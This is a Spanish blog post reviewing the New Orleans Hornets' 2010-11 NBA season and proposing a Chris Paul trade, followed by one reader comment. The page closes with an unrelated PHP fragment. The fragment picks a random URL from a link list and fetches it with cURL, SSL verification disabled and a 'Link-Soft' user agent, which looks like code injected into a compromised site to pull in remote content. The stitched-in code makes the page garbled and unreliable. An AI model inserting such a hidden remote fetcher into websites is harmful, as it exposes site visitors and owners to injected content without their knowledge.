New Orleans Hornets: Notable

06 de July de 2011 por txusma

A principio de temporada eran poco los que daban un duro por los Hornets. Tras la adquisición de Trevor Ariza a cambio de Darren Collison contaban con un buen quinteto en el que brillaba con luz propia Chris Paul al lado de secundarios de lujo como David West o Emeka Okafor. Sin embargo, más allá del cinco titular la mediocridad era evidente con un conjunto de suplentes francamente lamentable.

Pero la realidad fue completamente diferente, sobretodo las primeras semanas. De la mano del entrenado Monty Williams, con Marco Bellinelli como escolta titular en lugar de Marcus Thorton y Willie Green y Jason Smith jugando por encima de sus posibilidades, los Hornets consiguieron 8 victorias consecutivas y fueron el último equipo de la NBA en perder un partido. A partir de ahí su temporada se convirtió en una montaña rusa: Tras un parcial inicial de 11-1, perdieron 11 de los siguientes 16 partidos. Posteriormente, igualaron el récord de la franquicia con 10 victorias consecutivas que se rompió con un parcial de 2-9. Mucha irregularidad pero suficientes victorias para clasificarse para los Playoffs en una cómoda sexta posición del Oeste.

Durante la temporada el GM, Dell Demps, mejoró el equipo añadiendo fondo de armario. En Noviembre se hizo con Jarrett Jack a cambio de Jarryd Bayless, que había llegado poco antes a la franquicia, y en febrero traspasó a un marginado Marcus Thorton a cambio de Carl Landry, mejorando el juego interior y procurando de un recambio de calidad a David West y Emeka Okafor. Posiblemente estos dos jugadores han sido la clave de la buena temporada de New Orleans. Okafor ha aportado un rol defensivo muy valioso convirtiéndose en insustituible y David West ha liderado al equipo durante toda la temporada en una regular season simplemente correcto de Chris Paul.

Los Hornets llegaron a los Playoffs sin David West, lesionado de gravedad semanas antes, y sin nada que perder ante los Lakers. Los expertos apostaban por una barrida angelina pero en el primer partido Chris Paul explotó y New Orleans dio la campanada. Solo pudieron ganar otro partido más pero llenaron a los Lakers de dudas, dudas que se verían confirmadas en la siguiente serie frente los Mavs. Los Hornets se fueron para casa pero con el deber cumplido y la cabeza bien levantada.

Lo mejor: El nivel de Emeka Okafor y David West. Los buenos movimientos del GM durante la temporada. La sorpresa de Marco Bellinelli, titular durante todo el año.

Lo peor: La lesión de David West. Con él en pista a lo mejor los Hornets aprietan aún más las clavijas a los Lakers. La mala situación económica de la franquicia.

Jugando a GM

David West ha optado por por no ejercer su Player Option y probar fortuna en el mercado de agentes libres. Con 31 años y recuperándose de una grave lesión, este será, probablemente, su último gran contrato. Su próximo destino parece estar en New Jersey.

– La baja de West dejaría a los Hornets en una situación muy delicada sobretodo en lo que respecta al futuro de Chris Paul. Durante este año, la directiva ha hecho un esfuerzo por traer al equipo buenos jugadores de complemento (Landry, Jack) pero esto nunca va a ser suficiente para Paul o West opten a un anillo. Con West fuera, los días de Paul en New Orleans están contados. Duele decirlo pero yo optaría por traspasarlo a mitad de temporada.

– Busquemos un equipo plagado de jóvenes, a poder ser con alguna estrella en la plantilla. ¿He oído los Pacers? Darren Collison, Paul George, Tyler Hansbrough y unas cuantas elecciones de draft podrían volar a New Orleans dejando a los Pacers con Chris Paul, George Hill, Danny Granger y Roy Hibbert, entre otros. Habría que igualar el traspaso pero eso ya es ingenierían financiera que dejamos a los GM del equipo.

– Con Collison, George, Ariza, Landry (al que renovaría) y Okafor como titulares y Hansbrough en el banco, los Hornets contarían con una base interesante. De todas maneras, el proceso de reconstrucción será largo y doloroso y posiblemente acabe en otra ciudad diferente a la que comience. ¿Seattle Hornets?

Comenta

Un comentario a esta entrada

  1. Esteban dice:
    #1

    mmmmmmmmmmmmmm la verdad es que cp3 vale por collison, geroge y tyler, pero si fuera los pacers no me arriesgaria a semejante traspaso, esos 3 jugadores estan en franco progreso, y aun no esta ni cerca de saberse suy techo, cp3 ha tenido lesiones varias, habria que renovarlo por mucho dinero y quitaria espacio para el resto, como dije anteiormente, LOS PACERS DEBEN CONTAR CON ESOS 3 JUGADOPRES JOVENES MAS HIBBERT Y DE AHY EN MAS INCORPORAR JUGADORES

    sin dudas seria un buen traspaso para NO, pierden a una mega estrella, la cual se iria de todos modos y se quedan con una base de 2 años en la liga, siendo titular con experieicnai y dos jovenes con gran futuro mas selcciones

    SINCERAMENTE DUDO Q EL CONTRATO DE PAUL VALGA TANTO A ESTA ALTURA, MAS SABIENDO QUE EN LA AGENCIA LIBRE NY VA A PUJAR CON TODAS SUS FUERZAS POR EL, quien tome el riesgo de fichar a paul, lo hara por menos de lo q dices, ya q dudo q no termine en NY, ORLANDO o los propios Lakers

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>